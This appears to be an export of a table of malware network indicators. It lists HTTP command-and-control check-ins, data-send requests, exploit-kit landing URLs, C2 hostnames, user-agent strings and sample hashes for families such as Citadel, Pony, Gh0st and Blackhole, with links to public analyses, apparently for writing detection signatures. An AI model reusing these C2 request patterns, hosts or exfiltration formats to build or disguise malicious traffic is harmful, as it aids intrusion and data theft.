Cache-Control: no-cache

2012-11
/dns/dnslookup?la=en&host=vcvcvcvc.dyndns.org&type=A&submit=Resolve
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)" Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) "06ddf39bc4b5c7a8950f1e8d11c44446 
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8

" "http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359"
DNSWatch / Protux GET /news.jpg /news.jpg "/news.jpg
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: checkerror.ucparlnet.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) "06ddf39bc4b5c7a8950f1e8d11c44446 
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8" "http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359"
DNSWatch / Protux POST /PHqgHumeay5705.mp3 /PHqgHumeay5705.mp3 "2011-05
http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache

2012-11
http://vcvcvcvc.dyndns.org:8080/index.pl ?id=21378
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Content-Type: multipart/form-data; boundary=----------2B9250BB47EE537B
Host: vcvcvcvc.dyndns.org 
Content-Length: 272
Proxy-Connection: keep-alive
Pragma: no-cache
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache" Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) "06ddf39bc4b5c7a8950f1e8d11c44446 
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8" "http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359"
Andromeda POST /new/gate.php /gate.php "Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Content-Length: 32
Host: seantit.ru

mejRs96VP96+PIRfAjNy+Izj9E8jZscm" Mozilla/4.0 85F908A5BD0ADA2D72D138E038AECC7D http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Citadel POST /g.php /g.php "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: nologo0091.org
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache
......y.....m.....x.).600Y.J.z......Yy.<(X.T..... .....A.w....a.....}(R.........T...-:.N..>..........qqm.n.......\.<.X@>.." Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Citadel (Zbot var) POST /C270suqdh/file.php /file.php "Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: vivaspace2013.com
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache

..Cx.oB...3.Yc>........8|....M.........8...E.a4.!.A...A+.z.Q...,\.\<\.#.$?.........@;...C'J-jL...R....)3.HP....eu......." Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 3D6046E1218FB525805E5D8FDC605361 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Pony loader POST /ponyb/gate.php HTTP/1.0 /gate.php "/ponyb/gate.php HTTP/1.0
Host: mail.yaklasim.com
Accept: /
Accept-Encoding: identity, ;q=0
Accept-Language: en-US
Content-Length: 273
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

...Y........XT..L.S[.lG...<^-.a..v.'..K~# ......#.IP...6......<.C.M!..lL7.....$.?._..N.k>.`=." Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Reedum GET 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] "220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
USER user37704
331 .................. ............ ...... ........................ user37704
PASS intro22
230 ........................ user37704 ..................
TYPE A
200 ...... .................... .. A
PORT 10,0,2,15,4,24
500 ........................ .............. PORT
LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
500 LPRT .... ...................." 0ca4f93a848cf01348336a8c6ff22daf http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
APT1 WEBC2_RAVE GET /comp/sem/resources.htm /resources.htm "User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache
The Trojan parses (0x004016D0) the received data for the HTML comment tags:
<!-- [Base64 encoded data] -->" HTTP Mozilla/5.0(compatible+MSIE) a2534e9b7e4146368ea3245381830eb0 http://www.cyberengineeringservices.com/analysis-of-file-winsrv-exe/
backdoor ? GET /18110123/page_32262 308.html /page_32262 308.html "Accept: 
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: cuteoverload. dyndns . org
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Win32) http://www.fireeye.com/blog/technical/cyber-exploits/2012/09/analysis-of-malware-page.html#more-14
Banechant 1 GET /IGKKT /IGKKT "
Accept: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727)
Host: ow.ly
Connection: Keep-Alive . . . .

Error 301, implicitly redirects to malicious site
HTTP/1.1 301 Moved Permanently
Date: Fri, 15 Mar 2013 16:31:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5. 3. 2-1ubuntu4. 18
set-cookie: OWLYSID=f6f604d22494a738706d64353e3536d91c5d69e1; path=/
" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727) http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
Banechant payload dl 2 GET /adserv/logo.jpg HTTP /1.1 /logo.jpg "Accept: image/jpeg
User-Agent:Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2)
Connection: Keep-Alive
host: . symbisecure.com" Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2) http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
Beebus GET /windosdate/v6/default.aspx?ln=en-us /v6/default.aspx?ln=en-us "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: update.microsoft.com
Cookie: WC1=V=3&GUID=afe1e295d3c94b2ca137abc405a63a57" Mozilla/4.0 (compatible; ) http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Beebus C2 checkin GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 /s/asp?XAAAAM "/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 68.96.31.136" Mozilla/4.0 (compatible; ) d7ec457be3fad8057580e07cae74becb http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Beebus C2 checkin GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 /s/asp?XAAAAM "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: bee.businessconsults.net" Mozilla/4.0 (compatible; ) 7ed557921ac60dfcb295ebabfd972301 http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Beebus data send POST /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2 /s/asp?__u "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host:
Content-Length: 563
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; )
Blackhole 2 GET /fded177fe12651bb038f3f11b01c4168/q.php /q.php "/fded177fe12651bb038f3f11b01c4168/q.php
Accept: text/html, application/xhtml+xml, /
Referer: http://www.jobs-located-near.com/Lanoka%20Harbor/NJ/08734/Internship/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 193.93.248.227
Connection: Keep-Alive" victim UA "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_blackhole-exploit-kit.pdf
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html"
Cookies /Cookiebag / Dalbot GET /1799.asp /1799.asp "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: usnftc.org
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWWV5bX1ADBBgfBQoGDlYmKic8KjkuIz4lPy45UA==

'command=qwert;clientkey=2504;hostname=MALWAREHUNTER;'" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 0C28AD34F90950BC784339EC9F50D288 http://intelreport.mandiant.com/
Cookies /Cookiebag / Dalbot GET "/3961.html
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=

" "
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022;
.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 216.62.168.251:8080
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 8080 2c4cabb4ca19ddf87c7f11bad44bdf05 http://www.cyberengineeringservices.com/trojan-cookies/
Cookies /Cookiebag / Dalbot GET /8223.asp (also can be like /2007.asp,/2013.asp etc <p>/8223.asp <p>/2007.asp <p>/2013.asp "/8223.asp
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 1.234.1.68
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 9b6692295fadf24b512d5f63e4f74d15 http://labs.alienvault.com/labs/index.php/2012/unveiling-a-spearphishing-campaign-and-possible-ramifications/
Cookies /Cookiebag / Dalbot GET /indexs.zip /indexs.zip "/indexs.zip
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 840BD11343D140916F45223BA05ABACB http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Coswid GET /old/google.png /google.png "Accept: . . . . . ,
User-Agent: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32)
Host: firstwillnessclub.com" [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32) "726ef24b8eff4c4121c73861756fb9a3
a4ba6540520c375875bf46cf8e19cb7d
09fd067b6d944bf111857f6f60b7471e
" http://labs.alienvault.com/labs/index.php/category/blog/snort-blog/page/2/
CVE-2012-0754 SWF in DOC GET /test.mp4 "Accept: /
Accept-Language: en-US
x-flash-version: 11,1,102,55
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 208.115.230.76
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) E92A4FC283EB2802AD6D0E24C7FCC857 http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html
CVE-2012-0779 GET /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000 /essais.swf? "Accept: /
User-Agent: contype
Host: 204.45.73.69" contype 1750A38A44151493B675538A1AC2070B http://contagiodump.blogspot.com/2012/05/may-3-cve-2012-0779-world-uyghur.html
Darkmegi GET /20111230.jpg /20111230.jpg "/20111230.jpg
Host: images.hananren.com
User-Agent: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727)
Cache-Control: no-cache" Mozilla/4.0+(compatible;+MSIE+6.0; +Windows+NT+5.1;+SV1;+ .NET+CLR+2.0.50727) 6C8F9658A390C24A9F4551DC15063927 http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html
Darkness DDos v8g GET /index.php?uid=587609&ver=8g%20XP /index.php?uid= "/index.php?uid=587609&ver=8g%20XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke.info
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) F03Bc8Dcc090607F38Ffb3A36Ccacf48 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Depyot GET /new/3d/d/pdf.php?id=2 /3d/d/pdf.php?id= "/new/3d/d/pdf .php?id=2 HTTP/1. 1
User-Agent: Mozilla/4.0 (compatible)
Host: www.3dvideo. ru
Cache-Control: no-cache
" Mozilla/4.0 (compatible) 651fad35d276e5dedc56dfe7f3b5f125 http://www.fireeye.com/blog/technical/targeted-attack/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html
Destory Rat / Sogu / Thoper POST /update?id=000f6b50 /update?id= "/update?id=000f6b50
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705)
Host: exchange.likescandy.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 09B8B54F78A10C435CD319070AA13C28 http://labs.alienvault.com/labs/index.php/2012/the-connection-between-the-plugx-chinese-gang-and-the-latest-internet-explorer-zeroday/
Destory Rat / Sogu / Thoper POST /update?id=3109c2a2 /update?id= "/update?id=3109c2a2
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;)
Host: path.alyac.org
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
Destory Rat / Sogu / Thoper POST /update?product=windows /update?product=windows "/update?product=windows
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
DirtJumper DDoS POST /678/index.php /index.php "/678/index.php HTTP/1.0
Host: asdaddddaaaa.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

k=426924814555748" Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Dirtjumper ddos POST /boi854tr4w.php /boi854tr4w.php "/boi854tr4w.php HTTP/1.0
Host: coppercreek.ru
Accept: /
Accept-Encoding: identity, ;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://blog.shadowserver.org/page/3/
DNSChanger POST /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg== "/d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg==
Content-Type: application/x-www-form-urlencoded
Host: borderspot.net
User-Agent: Mozilla/6.0 (Windows; w3.0)
Content-Length: 193
Connection: close
Cache-Control: no-cache

data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45" Mozilla/6.0 (Windows; w3.0) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Downloader BMP GET /images/evil.bmp /evil.bmp "/images/evil.bmp
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) 4IRh2K1I3Zl=O
Host: www.badsite4you.com
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) d166a59e71535a42267e9fa993ca8e7e http://www.cyberengineeringservices.com/downloader-bmp/
Einstein GET /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs /gttfi.php?id= "/ gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 1c2dfd36ad8cad978a0859d459f10326 http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
Einstein data send POST /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK /gttfi.php?id= "/ gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Content-Length: 420
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 1c2dfd36ad8cad978a0859d459f10326 http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
EK - Blackhole 2 landing GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd /default-php-version.php?mdm= "Accept: /
Accept-Language: en-US
Referer: http://autorepairgreeley.info/news/default-php-version.php
x-flash-version: 10,1,53,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: autorepairgreeley.info
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
EK Blackhole 1 GET /showthread.php?t=d7ad916d1c0396ff /showthread.php?t= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 88.85.99.44:8080
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) 8080 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
EK Phoenix GET /navigator/jueoaritjuir.php /jueoaritjuir.php "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 78.83.233.242:8080
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Enfal / Lurid GET /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d /wlc3/ "Host: home. coffeeibus . com
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid GET /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite /nm/ "Host: note.webmail-temp.com
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid POST /cgi-bin/CMS_SubitAll.cgi /CMS_SubitAll.cgi "Host: virustotel.3-a.net
Content-Length: 115
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid POST /cgl-bin/Owpq4.cgi /Owpq4.cgi "Host: note.webmail-temp.com
Content-Length: 83
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid POST /Sjwpc/odw3ux "Host: hone.coffeeibus.com
Content-length: 104
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Flashback OSX GET /statistics.html /statistics.html "Host: cuojshtbohnt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1" Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 5616687FAC5D040AE65CB1B08717A6AA http://contagiodump.blogspot.com/2012/04/i-have-been-tracking-infections-too-and.html
Foxy POST /404error.asp /404error.asp "Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) d271ae0f4e9230af3b61eafe7f671fde http://www.cyberengineeringservices.com/364/
Foxy Checkin GET /images/leftnav_prog_bg.jpg /leftnav_prog_bg.jpg "User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Cache-Control: no-cache" Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) d271ae0f4e9230af3b61eafe7f671fde http://www.cyberengineeringservices.com/364/
Gh0st ASP ver GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69 /v2/1oginv2.asp? "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR
1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: .palms-us.org" Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Gh0st PHP ver GET /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l /queenfun/vl /login.php? "HTTP/1 .1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: . ibmunion.net" Mozilla/4.0 (compatible; ) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Gh0st v2000 var n "v2010........f...............(
......Service Pack 2..?..|...|...|0.@.." v2010 "v2010........f...............(
......Service Pack 2..?..|...|...|0.@..............4$..............4$..^.....|.....]...]......{l....$.0%.|.....a2.rSingleO....t.....2.........d
....j.DELLXT..............................................g...00-50-56-3C-F6-41...'......." B1D09374006E20FA795B2E70BF566C6D http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
GoogleAdC2 GET /html/lost.html /lost.html "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: news.googleupdateservices.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) 90993b5279365b204148e8b04edf477f http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
GoogleAdC2 2nd stage GET /Trojan2.jpg /Trojan2.jpg "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: www.reallybad.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) 90993b5279365b204148e8b04edf477f http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
Googles GET /sll/monica.jpg /monica.jpg "User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
=1j2CVh2s#IE6DBo6Iru; MNA)
Host: www.avvmail.com
Cache-Control: no-cache" "
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
Mozilla/4.0(compatible;WindowsNT5.1; MSIE8.0) 
Mozilla/4.0(compatible;WindowsNT5.1; MSIE7.0;Trident/4.0" BF80DBF969B73790253F683CD723FD71 http://intelreport.mandiant.com/
Greencat GET /<HOSTNAME>/ "GET /<HOSTNAME>/ HTTP/1.1
Accept: /
Pragma: no-cache
Cache-Control: max-age=0
Cache-Control: no-cache
Connection: Keep-Alive
Computer: <HOSTNAME>
User-Agent: Mozilla/4.0
Host: flash.aunewsonline.com
Content-Length: <ContentLength>

